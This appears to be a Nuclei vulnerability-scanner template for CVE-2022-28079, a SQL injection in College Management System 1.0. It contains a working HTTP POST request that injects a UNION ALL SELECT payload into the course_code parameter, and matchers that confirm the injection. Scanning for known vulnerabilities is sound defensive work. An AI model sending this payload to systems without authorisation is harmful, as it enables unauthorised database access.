nuclei-templates/cves/2022/CVE-2022-28079.yaml

46 lines
1.3 KiB
YAML

id: CVE-2022-28079
info:
name: College Management System 1.0 - SQL Injection
author: ritikchaddha
severity: high
description: |
College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
reference:
- https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated
- https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
- https://nvd.nist.gov/vuln/detail/CVE-2022-28079
- https://code-projects.org/college-management-system-in-php-with-source-code/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-28079
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cms,collegemanagement
variables:
num: "999999999"
requests:
- raw:
- |
POST /admin/asign-single-student-subjects.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
- type: status
status:
- 302
# Enhanced by mp on 2022/07/15